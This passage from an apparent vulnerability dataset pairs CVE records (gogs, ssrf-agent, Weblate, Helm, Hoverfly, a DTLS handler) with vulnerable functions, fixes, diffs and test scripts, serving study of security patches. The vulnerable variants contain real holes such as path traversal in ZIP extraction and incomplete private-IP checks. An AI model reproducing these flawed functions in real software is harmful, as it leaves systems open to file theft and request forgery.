errClientCertificateNotVerified\n\t\t}\n\tcase RequireAndVerifyClientCert:\n\t\tif state.PeerCertificates == nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.NoCertificate}, errClientCertificateRequired\n\t\t}\n\t\tif !state.peerCertificatesVerified {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, errClientCertificateNotVerified\n\t\t}\n\tcase NoClientCert, RequestClientCert:\n\t\treturn flight6, nil, nil\n\t}\n\n\treturn flight6, nil, nil\n}"}], "fix_func": [{"id": "fix_go_87_1", "commit": "d2f7971", "file_path": "flight4handler.go", "start_line": "19", "end_line": "205", "snippet": "func flight4Parse(ctx context.Context, c flightConn, state *State, cache *handshakeCache, cfg *handshakeConfig) (flightVal, *alert.Alert, error) { //nolint:gocognit\n\tseq, msgs, ok := cache.fullPullMap(state.handshakeRecvSequence, state.cipherSuite,\n\t\thandshakeCachePullRule{handshake.TypeCertificate, cfg.initialEpoch, true, true},\n\t\thandshakeCachePullRule{handshake.TypeClientKeyExchange, cfg.initialEpoch, true, false},\n\t\thandshakeCachePullRule{handshake.TypeCertificateVerify, cfg.initialEpoch, true, true},\n\t)\n\tif !ok {\n\t\t// No valid message received. Keep reading\n\t\treturn 0, nil, nil\n\t}\n\n\t// Validate type\n\tvar clientKeyExchange *handshake.MessageClientKeyExchange\n\tif clientKeyExchange, ok = msgs[handshake.TypeClientKeyExchange].(*handshake.MessageClientKeyExchange); !ok {\n\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, nil\n\t}\n\n\tif h, hasCert := msgs[handshake.TypeCertificate].(*handshake.MessageCertificate); hasCert {\n\t\tstate.PeerCertificates = h.Certificate\n\t\t// If the client offer its certificate, just disable session resumption.\n\t\t// Otherwise, we have to store the certificate identitfication and expire time.\n\t\t// And we have to check whether this certificate expired, revoked or changed.\n\t\t//\n\t\t// https://curl.se/docs/CVE-2016-5419.html\n\t\tstate.SessionID = nil\n\t}\n\n\tif h, hasCertVerify := msgs[handshake.TypeCertificateVerify].(*handshake.MessageCertificateVerify); hasCertVerify {\n\t\tif state.PeerCertificates == nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.NoCertificate}, errCertificateVerifyNoCertificate\n\t\t}\n\n\t\tplainText := cache.pullAndMerge(\n\t\t\thandshakeCachePullRule{handshake.TypeClientHello, cfg.initialEpoch, true, false},\n\t\t\thandshakeCachePullRule{handshake.TypeServerHello, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeCertificate, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeServerKeyExchange, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeCertificateRequest, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeServerHelloDone, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeCertificate, cfg.initialEpoch, true, false},\n\t\t\thandshakeCachePullRule{handshake.TypeClientKeyExchange, cfg.initialEpoch, true, false},\n\t\t)\n\n\t\t// Verify that the pair of hash algorithm and signiture is listed.\n\t\tvar validSignatureScheme bool\n\t\tfor _, ss := range cfg.localSignatureSchemes {\n\t\t\tif ss.Hash == h.HashAlgorithm && ss.Signature == h.SignatureAlgorithm {\n\t\t\t\tvalidSignatureScheme = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif !validSignatureScheme {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InsufficientSecurity}, errNoAvailableSignatureSchemes\n\t\t}\n\n\t\tif err := verifyCertificateVerify(plainText, h.HashAlgorithm, h.Signature, state.PeerCertificates); err != nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, err\n\t\t}\n\t\tvar chains [][]*x509.Certificate\n\t\tvar err error\n\t\tvar verified bool\n\t\tif cfg.clientAuth >= VerifyClientCertIfGiven {\n\t\t\tif chains, err = verifyClientCert(state.PeerCertificates, cfg.clientCAs); err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, err\n\t\t\t}\n\t\t\tverified = true\n\t\t}\n\t\tif cfg.verifyPeerCertificate != nil {\n\t\t\tif err := cfg.verifyPeerCertificate(state.PeerCertificates, chains); err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, err\n\t\t\t}\n\t\t}\n\t\tstate.peerCertificatesVerified = verified\n\t} else if state.PeerCertificates != nil {\n\t\t// A certificate was received, but we haven't seen a CertificateVerify\n\t\t// keep reading until we receieve one\n\t\treturn 0, nil, nil\n\t}\n\n\tif !state.cipherSuite.IsInitialized() {\n\t\tserverRandom := state.localRandom.MarshalFixed()\n\t\tclientRandom := state.remoteRandom.MarshalFixed()\n\n\t\tvar err error\n\t\tvar preMasterSecret []byte\n\t\tif state.cipherSuite.AuthenticationType() == CipherSuiteAuthenticationTypePreSharedKey {\n\t\t\tvar psk []byte\n\t\t\tif psk, err = cfg.localPSKCallback(clientKeyExchange.IdentityHint); err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\t\t\tstate.IdentityHint = clientKeyExchange.IdentityHint\n\t\t\tswitch state.cipherSuite.KeyExchangeAlgorithm() {\n\t\t\tcase CipherSuiteKeyExchangeAlgorithmPsk:\n\t\t\t\tpreMasterSecret = prf.PSKPreMasterSecret(psk)\n\t\t\tcase (CipherSuiteKeyExchangeAlgorithmPsk | CipherSuiteKeyExchangeAlgorithmEcdhe):\n\t\t\t\tif preMasterSecret, err = prf.EcdhePSKPreMasterSecret(psk, clientKeyExchange.PublicKey, state.localKeypair.PrivateKey, state.localKeypair.Curve); err != nil {\n\t\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, errInvalidCipherSuite\n\t\t\t}\n\t\t} else {\n\t\t\tpreMasterSecret, err = prf.PreMasterSecret(clientKeyExchange.PublicKey, state.localKeypair.PrivateKey, state.localKeypair.Curve)\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.IllegalParameter}, err\n\t\t\t}\n\t\t}\n\n\t\tif state.extendedMasterSecret {\n\t\t\tvar sessionHash []byte\n\t\t\tsessionHash, err = cache.sessionHash(state.cipherSuite.HashFunc(), cfg.initialEpoch)\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\n\t\t\tstate.masterSecret, err = prf.ExtendedMasterSecret(preMasterSecret, sessionHash, state.cipherSuite.HashFunc())\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\t\t} else {\n\t\t\tstate.masterSecret, err = prf.MasterSecret(preMasterSecret, clientRandom[:], serverRandom[:], state.cipherSuite.HashFunc())\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\t\t}\n\n\t\tif err := state.cipherSuite.Init(state.masterSecret, clientRandom[:], serverRandom[:], false); err != nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t}\n\t\tcfg.writeKeyLog(keyLogLabelTLS12, clientRandom[:], state.masterSecret)\n\t}\n\n\tif len(state.SessionID) > 0 {\n\t\ts := Session{\n\t\t\tID: state.SessionID,\n\t\t\tSecret: state.masterSecret,\n\t\t}\n\t\tcfg.log.Tracef(\"[handshake] save new session: %x\", s.ID)\n\t\tif err := cfg.sessionStore.Set(state.SessionID, s); err != nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t}\n\t}\n\n\t// Now, encrypted packets can be handled\n\tif err := c.handleQueuedPackets(ctx); err != nil {\n\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t}\n\n\tseq, msgs, ok = cache.fullPullMap(seq, state.cipherSuite,\n\t\thandshakeCachePullRule{handshake.TypeFinished, cfg.initialEpoch + 1, true, false},\n\t)\n\tif !ok {\n\t\t// No valid message received. Keep reading\n\t\treturn 0, nil, nil\n\t}\n\tstate.handshakeRecvSequence = seq\n\n\tif _, ok = msgs[handshake.TypeFinished].(*handshake.MessageFinished); !ok {\n\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, nil\n\t}\n\n\tif state.cipherSuite.AuthenticationType() == CipherSuiteAuthenticationTypeAnonymous {\n\t\treturn flight6, nil, nil\n\t}\n\n\tswitch cfg.clientAuth {\n\tcase RequireAnyClientCert:\n\t\tif state.PeerCertificates == nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.NoCertificate}, errClientCertificateRequired\n\t\t}\n\tcase VerifyClientCertIfGiven:\n\t\tif state.PeerCertificates != nil && !state.peerCertificatesVerified {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, errClientCertificateNotVerified\n\t\t}\n\tcase RequireAndVerifyClientCert:\n\t\tif state.PeerCertificates == nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.NoCertificate}, errClientCertificateRequired\n\t\t}\n\t\tif !state.peerCertificatesVerified {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, errClientCertificateNotVerified\n\t\t}\n\tcase NoClientCert, RequestClientCert:\n\t\treturn flight6, nil, nil\n\t}\n\n\treturn flight6, nil, nil\n}"}], "vul_patch": "--- a/flight4handler.go\n+++ b/flight4handler.go\n@@ -71,6 +71,10 @@\n \t\t\t}\n \t\t}\n \t\tstate.peerCertificatesVerified = verified\n+\t} else if state.PeerCertificates != nil {\n+\t\t// A certificate was received, but we haven't seen a CertificateVerify\n+\t\t// keep reading until we receieve one\n+\t\treturn 0, nil, nil\n \t}\n \n \tif !state.cipherSuite.IsInitialized() {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-1986", "cve_description": "OS Command Injection in GitHub repository gogs/gogs prior to 0.12.9.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/gogs/gogs", "patch_url": ["https://github.com/gogs/gogs/commit/38aff73251cc46ced96dd608dab6190415032a82"], "programing_language": "Go", "vul_func": [{"id": "vul_go_6_1", "commit": "6982749", "file_path": "internal/db/repo_editor.go", "start_line": 468, "end_line": 474, "snippet": "func isRepositoryGitPath(path string) bool {\n\treturn strings.HasSuffix(path, \".git\") ||\n\t\tstrings.Contains(path, \".git\"+string(os.PathSeparator)) ||\n\t\t// Windows treats \".git.\" the same as \".git\"\n\t\tstrings.HasSuffix(path, \".git.\") ||\n\t\tstrings.Contains(path, \".git.\"+string(os.PathSeparator))\n}"}], "fix_func": [{"id": "fix_go_6_1", "commit": "38aff73", "file_path": "internal/db/repo_editor.go", "start_line": 468, "end_line": 476, "snippet": "func isRepositoryGitPath(path string) bool {\n\treturn strings.HasSuffix(path, \".git\") ||\n\t\tstrings.Contains(path, \".git/\") ||\n\t\tstrings.Contains(path, `.git\\`) ||\n\t\t// Windows treats \".git.\" the same as \".git\"\n\t\tstrings.HasSuffix(path, \".git.\") ||\n\t\tstrings.Contains(path, \".git./\") ||\n\t\tstrings.Contains(path, `.git.\\`)\n}"}], "vul_patch": "--- a/internal/db/repo_editor.go\n+++ b/internal/db/repo_editor.go\n@@ -1,7 +1,9 @@\n func isRepositoryGitPath(path string) bool {\n \treturn strings.HasSuffix(path, \".git\") ||\n-\t\tstrings.Contains(path, \".git\"+string(os.PathSeparator)) ||\n+\t\tstrings.Contains(path, \".git/\") ||\n+\t\tstrings.Contains(path, `.git\\`) ||\n \t\t// Windows treats \".git.\" the same as \".git\"\n \t\tstrings.HasSuffix(path, \".git.\") ||\n-\t\tstrings.Contains(path, \".git.\"+string(os.PathSeparator))\n+\t\tstrings.Contains(path, \".git./\") ||\n+\t\tstrings.Contains(path, `.git.\\`)\n }\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-1986:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/gogs\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^Test_isRepositoryGitPath$ gogs.io/gogs/internal/db\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-1986:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/gogs\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(Test_isRepositoryGitPath)$' gogs.io/gogs/internal/db\n"} {"cve_id": "CVE-2021-23718", "cve_description": "The package ssrf-agent before 1.0.5 are vulnerable to Server-side Request Forgery (SSRF) via the defaultIpChecker function. It fails to properly validate if the IP requested is private.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/welefen/ssrf-agent", "patch_url": ["https://github.com/welefen/ssrf-agent/commit/9607175acd0647d821bae4e8fcc3b712aca3fd2d#diff-e727e4bdf3657fd1d798edcd6b099d6e092f8573cba266154583a746bba0f346"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_257_1", "commit": "cec2b85", "file_path": "index.js", "start_line": "3", "end_line": "3", "snippet": "const { isPrivate, isV4Format } = require('ip');"}, {"id": "vul_js_257_2", "commit": "cec2b85", "file_path": "index.js", "start_line": "13", "end_line": "16", "snippet": "const defaultIpChecker = ip => {\n if (isV4Format(ip)) {\n return !isPrivate(ip);\n }"}], "fix_func": [{"id": "fix_js_257_1", "commit": "9607175", "file_path": "index.js", "start_line": "3", "end_line": "3", "snippet": "const { isPrivate, isV4Format, isV6Format } = require('ip');"}, {"id": "fix_js_257_2", "commit": "9607175", "file_path": "index.js", "start_line": "13", "end_line": "16", "snippet": "const defaultIpChecker = ip => {\n if (isV4Format(ip) || isV6Format(ip)) {\n return !isPrivate(ip);\n }"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1 +1 @@\n-const { isPrivate, isV4Format } = require('ip');\n+const { isPrivate, isV4Format, isV6Format } = require('ip');\n\n--- a/index.js\n+++ b/index.js\n@@ -1,4 +1,4 @@\n const defaultIpChecker = ip => {\n- if (isV4Format(ip)) {\n+ if (isV4Format(ip) || isV6Format(ip)) {\n return !isPrivate(ip);\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-39303", "cve_description": "Weblate is a web based localization tool. Prior to version 5.6.2, Weblate didn't correctly validate filenames when restoring project backup. It may be possible to gain unauthorized access to files on the server using a crafted ZIP file. This issue has been addressed in Weblate 5.6.2. As a workaround, do not allow untrusted users to create projects.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/WeblateOrg/weblate", "patch_url": ["https://github.com/WeblateOrg/weblate/commit/b6a7eace155fa0feaf01b4ac36165a9c5e63bfdd"], "programing_language": "Python", "vul_func": [{"id": "vul_py_348_1", "commit": "0137a35d95c2731b554737bbb1476b90d8118095", "file_path": "weblate/trans/backups.py", "start_line": 564, "end_line": 625, "snippet": " def restore(self, project_name: str, project_slug: str, user, billing=None):\n if not isinstance(self.filename, str):\n raise TypeError(\"Need a filename string.\")\n with ZipFile(self.filename, \"r\") as zipfile:\n self.load_data(zipfile)\n\n # Create project\n kwargs = self.data[\"project\"].copy()\n kwargs[\"name\"] = project_name\n kwargs[\"slug\"] = project_slug\n self.project = project = Project.objects.create(**kwargs)\n\n # Handle billing and ACL (creating user needs access)\n self.project.post_create(user, billing)\n\n # Create labels\n labels = Label.objects.bulk_create(\n Label(project=project, **entry) for entry in self.data[\"labels\"]\n )\n self.labels_map = {label.name: label for label in labels}\n\n # Import translation memory\n memory = self.load_memory(zipfile)\n Memory.objects.bulk_create(\n [\n Memory(\n project=project,\n origin=entry[\"origin\"],\n source=entry[\"source\"],\n target=entry[\"target\"],\n source_language=self.import_language(entry[\"source_language\"]),\n target_language=self.import_language(entry[\"target_language\"]),\n )\n for entry in memory\n ]\n )\n\n # Extract VCS\n for name in zipfile.namelist():\n if name.startswith(self.VCS_PREFIX):\n targetpath = os.path.join(\n project.full_path, name[self.VCS_PREFIX_LEN :]\n )\n upperdirs = os.path.dirname(targetpath)\n if upperdirs and not os.path.exists(upperdirs):\n os.makedirs(upperdirs)\n with zipfile.open(name) as source, open(targetpath, \"wb\") as target:\n copyfileobj(source, target)\n\n # Create components\n self.load_components(zipfile, self.restore_component)\n\n # Fixup linked components\n old_slug = f\"/{self.data['project']['slug']}/\"\n new_slug = f\"/{project.slug}/\"\n for component in self.project.component_set.filter(\n repo__istartswith=\"weblate:\"\n ):\n component.repo = component.repo.replace(old_slug, new_slug)\n component.save()\n\n return self.project"}], "fix_func": [{"id": "fix_py_348_1", "commit": "b6a7eace155fa0feaf01b4ac36165a9c5e63bfdd", "file_path": "weblate/trans/backups.py", "start_line": 564, "end_line": 627, "snippet": " def restore(self, project_name: str, project_slug: str, user, billing=None):\n if not isinstance(self.filename, str):\n raise TypeError(\"Need a filename string.\")\n with ZipFile(self.filename, \"r\") as zipfile:\n self.load_data(zipfile)\n\n # Create project\n kwargs = self.data[\"project\"].copy()\n kwargs[\"name\"] = project_name\n kwargs[\"slug\"] = project_slug\n self.project = project = Project.objects.create(**kwargs)\n\n # Handle billing and ACL (creating user needs access)\n self.project.post_create(user, billing)\n\n # Create labels\n labels = Label.objects.bulk_create(\n Label(project=project, **entry) for entry in self.data[\"labels\"]\n )\n self.labels_map = {label.name: label for label in labels}\n\n # Import translation memory\n memory = self.load_memory(zipfile)\n Memory.objects.bulk_create(\n [\n Memory(\n project=project,\n origin=entry[\"origin\"],\n source=entry[\"source\"],\n target=entry[\"target\"],\n source_language=self.import_language(entry[\"source_language\"]),\n target_language=self.import_language(entry[\"target_language\"]),\n )\n for entry in memory\n ]\n )\n\n # Extract VCS\n for name in zipfile.namelist():\n if name.startswith(self.VCS_PREFIX):\n path = name[self.VCS_PREFIX_LEN :]\n # Skip potentially dangerous paths\n if path != os.path.normpath(path):\n continue\n targetpath = os.path.join(project.full_path, path)\n upperdirs = os.path.dirname(targetpath)\n if upperdirs and not os.path.exists(upperdirs):\n os.makedirs(upperdirs)\n with zipfile.open(name) as source, open(targetpath, \"wb\") as target:\n copyfileobj(source, target)\n\n # Create components\n self.load_components(zipfile, self.restore_component)\n\n # Fixup linked components\n old_slug = f\"/{self.data['project']['slug']}/\"\n new_slug = f\"/{project.slug}/\"\n for component in self.project.component_set.filter(\n repo__istartswith=\"weblate:\"\n ):\n component.repo = component.repo.replace(old_slug, new_slug)\n component.save()\n\n return self.project"}], "vul_patch": "--- a/weblate/trans/backups.py\n+++ b/weblate/trans/backups.py\n@@ -38,9 +38,11 @@\n # Extract VCS\n for name in zipfile.namelist():\n if name.startswith(self.VCS_PREFIX):\n- targetpath = os.path.join(\n- project.full_path, name[self.VCS_PREFIX_LEN :]\n- )\n+ path = name[self.VCS_PREFIX_LEN :]\n+ # Skip potentially dangerous paths\n+ if path != os.path.normpath(path):\n+ continue\n+ targetpath = os.path.join(project.full_path, path)\n upperdirs = os.path.dirname(targetpath)\n if upperdirs and not os.path.exists(upperdirs):\n os.makedirs(upperdirs)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-15184", "cve_description": "In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the `alias` field on a `Chart.yaml` is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the `dependencies` field of any untrusted chart, verifying that the `alias` field is either not used, or (if used) does not contain newlines or path characters.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/helm/helm", "patch_url": ["https://github.com/helm/helm/commit/e7c281564d8306e1dcf8023d97f972449ad74850"], "programing_language": "Go", "vul_func": [{"id": "vul_go_131_1", "commit": "860b1a9", "file_path": "pkg/chart/metadata.go", "start_line": 68, "end_line": 86, "snippet": "func (md *Metadata) Validate() error {\n\tif md == nil {\n\t\treturn ValidationError(\"chart.metadata is required\")\n\t}\n\tif md.APIVersion == \"\" {\n\t\treturn ValidationError(\"chart.metadata.apiVersion is required\")\n\t}\n\tif md.Name == \"\" {\n\t\treturn ValidationError(\"chart.metadata.name is required\")\n\t}\n\tif md.Version == \"\" {\n\t\treturn ValidationError(\"chart.metadata.version is required\")\n\t}\n\tif !isValidChartType(md.Type) {\n\t\treturn ValidationError(\"chart.metadata.type must be application or library\")\n\t}\n\t// TODO validate valid semver here?\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_131_1", "commit": "e7c2815", "file_path": "pkg/chart/metadata.go", "start_line": 68, "end_line": 95, "snippet": "func (md *Metadata) Validate() error {\n\tif md == nil {\n\t\treturn ValidationError(\"chart.metadata is required\")\n\t}\n\tif md.APIVersion == \"\" {\n\t\treturn ValidationError(\"chart.metadata.apiVersion is required\")\n\t}\n\tif md.Name == \"\" {\n\t\treturn ValidationError(\"chart.metadata.name is required\")\n\t}\n\tif md.Version == \"\" {\n\t\treturn ValidationError(\"chart.metadata.version is required\")\n\t}\n\tif !isValidChartType(md.Type) {\n\t\treturn ValidationError(\"chart.metadata.type must be application or library\")\n\t}\n\n\t// Aliases need to be validated here to make sure that the alias name does\n\t// not contain any illegal characters.\n\tfor _, dependency := range md.Dependencies {\n\t\tif err := validateDependency(dependency); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\t// TODO validate valid semver here?\n\treturn nil\n}"}, {"id": "fix_go_131_2", "commit": "e7c2815", "file_path": "pkg/chart/chart.go", "start_line": 31, "end_line": 31, "snippet": "var aliasNameFormat = regexp.MustCompile(\"^[a-zA-Z0-9_-]+$\")"}, {"id": "fix_go_131_3", "commit": "e7c2815", "file_path": "pkg/chart/errors.go", "start_line": 28, "end_line": 30, "snippet": "func ValidationErrorf(msg string, args ...interface{}) ValidationError {\n\treturn ValidationError(fmt.Sprintf(msg, args...))\n}"}, {"id": "fix_go_131_4", "commit": "e7c2815", "file_path": "pkg/chart/metadata.go", "start_line": 108, "end_line": 113, "snippet": "func validateDependency(dep *Dependency) error {\n\tif len(dep.Alias) > 0 && !aliasNameFormat.MatchString(dep.Alias) {\n\t\treturn ValidationErrorf(\"dependency %q has disallowed characters in the alias\", dep.Name)\n\t}\n\treturn nil\n}"}], "vul_patch": "--- a/pkg/chart/metadata.go\n+++ b/pkg/chart/metadata.go\n@@ -14,6 +14,15 @@\n \tif !isValidChartType(md.Type) {\n \t\treturn ValidationError(\"chart.metadata.type must be application or library\")\n \t}\n+\n+\t// Aliases need to be validated here to make sure that the alias name does\n+\t// not contain any illegal characters.\n+\tfor _, dependency := range md.Dependencies {\n+\t\tif err := validateDependency(dependency); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\t}\n+\n \t// TODO validate valid semver here?\n \treturn nil\n }\n\n--- /dev/null\n+++ b/pkg/chart/metadata.go\n@@ -0,0 +1 @@\n+var aliasNameFormat = regexp.MustCompile(\"^[a-zA-Z0-9_-]+$\")\n\n--- /dev/null\n+++ b/pkg/chart/metadata.go\n@@ -0,0 +1,3 @@\n+func ValidationErrorf(msg string, args ...interface{}) ValidationError {\n+\treturn ValidationError(fmt.Sprintf(msg, args...))\n+}\n\n--- /dev/null\n+++ b/pkg/chart/metadata.go\n@@ -0,0 +1,6 @@\n+func validateDependency(dep *Dependency) error {\n+\tif len(dep.Alias) > 0 && !aliasNameFormat.MatchString(dep.Alias) {\n+\t\treturn ValidationErrorf(\"dependency %q has disallowed characters in the alias\", dep.Name)\n+\t}\n+\treturn nil\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-45388", "cve_description": "Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The `/api/v2/simulation` POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server. Note that, although the code prevents absolute paths from being specified, an attacker can escape out of the `hf.Cfg.ResponsesBodyFilesPath` base path by using `../` segments and reach any arbitrary files. This issue was found using the Uncontrolled data used in path expression CodeQL query for python. Users are advised to make sure the final path (`filepath.Join(hf.Cfg.ResponsesBodyFilesPath, filePath)`) is contained within the expected base path (`filepath.Join(hf.Cfg.ResponsesBodyFilesPath, \"/\")`). This issue is also tracked as GHSL-2023-274.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/SpectoLabs/hoverfly", "patch_url": ["https://github.com/SpectoLabs/hoverfly/commit/40f9b44"], "programing_language": "Go", "vul_func": [{"id": "vul_go_48_1", "commit": "4b6fa36", "file_path": "core/hoverfly_funcs.go", "start_line": 186, "end_line": 197, "snippet": "func (hf *Hoverfly) readResponseBodyFile(filePath string) (string, error) {\n\tif filepath.IsAbs(filePath) {\n\t\treturn \"\", fmt.Errorf(\"bodyFile contains absolute path (%s). only relative is supported\", filePath)\n\t}\n\n\tfileContents, err := ioutil.ReadFile(filepath.Join(hf.Cfg.ResponsesBodyFilesPath, filePath))\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn string(fileContents[:]), nil\n}"}], "fix_func": [{"id": "fix_go_48_1", "commit": "40f9b44", "file_path": "core/hoverfly_funcs.go", "start_line": 186, "end_line": 202, "snippet": "func (hf *Hoverfly) readResponseBodyFile(filePath string) (string, error) {\n\tif filepath.IsAbs(filePath) {\n\t\treturn \"\", fmt.Errorf(\"bodyFile contains absolute path (%s). only relative is supported\", filePath)\n\t}\n\n\tresolvedPath, err := util.ResolveAndValidatePath(hf.Cfg.ResponsesBodyFilesPath, filePath)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tfileContents, err := os.ReadFile(resolvedPath)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn string(fileContents[:]), nil\n}"}, {"id": "fix_go_48_2", "commit": "40f9b44", "file_path": "core/util/util.go", "start_line": 522, "end_line": 548, "snippet": "func ResolveAndValidatePath(basePath, relativePath string) (string, error) {\n\tabsBasePath, err := filepath.Abs(basePath)\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to get absolute base path: %v\", err)\n\t}\n\n\tcleanRelativePath := filepath.Clean(relativePath)\n\n\t// Check if the relative path starts with \"..\"\n\tif strings.HasPrefix(cleanRelativePath, \"..\") {\n\t\treturn \"\", fmt.Errorf(\"relative path is invalid as it attempts to backtrack\")\n\t}\n\n\tresolvedPath := filepath.Join(absBasePath, cleanRelativePath)\n\n\t// Verify that the resolved path is indeed a subpath of the base path\n\tfinalPath, err := filepath.Rel(absBasePath, resolvedPath)\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to get relative path: %v\", err)\n\t}\n\n\tif strings.HasPrefix(finalPath, \"..\") {\n\t\treturn \"\", fmt.Errorf(\"resolved path is outside the base path\")\n\t}\n\n\treturn resolvedPath, nil\n}"}], "vul_patch": "--- a/core/hoverfly_funcs.go\n+++ b/core/hoverfly_funcs.go\n@@ -3,7 +3,12 @@\n \t\treturn \"\", fmt.Errorf(\"bodyFile contains absolute path (%s). only relative is supported\", filePath)\n \t}\n \n-\tfileContents, err := ioutil.ReadFile(filepath.Join(hf.Cfg.ResponsesBodyFilesPath, filePath))\n+\tresolvedPath, err := util.ResolveAndValidatePath(hf.Cfg.ResponsesBodyFilesPath, filePath)\n+\tif err != nil {\n+\t\treturn \"\", err\n+\t}\n+\n+\tfileContents, err := os.ReadFile(resolvedPath)\n \tif err != nil {\n \t\treturn \"\", err\n \t}\n\n--- /dev/null\n+++ b/core/hoverfly_funcs.go\n@@ -0,0 +1,27 @@\n+func 